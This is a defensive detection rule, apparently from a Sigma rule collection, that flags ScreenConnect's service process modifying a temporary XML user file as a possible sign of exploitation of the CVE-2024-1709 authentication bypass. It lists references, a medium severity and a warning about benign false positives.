Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server.
This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.
references:
- https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
- https://www.cve.org/CVERecord?id=CVE-2024-1709
- https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
author: Matt Anderson, Andrew Schwartz, Caleb Stewart, Huntress
date: 2024-02-21
tags:
- attack.persistence
- cve.2024-1709
- detection.emerging-threats
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|endswith: '.xml'
TargetFilename|contains|all:
- 'Temp'
- 'ScreenConnect'
Image|endswith: '\ScreenConnect.Service.exe'
condition: selection
falsepositives:
- This will occur legitimately as well and will result in some benign activity.
level: medium
Convert to SIEM query
Showing 1051-1100 of 1,440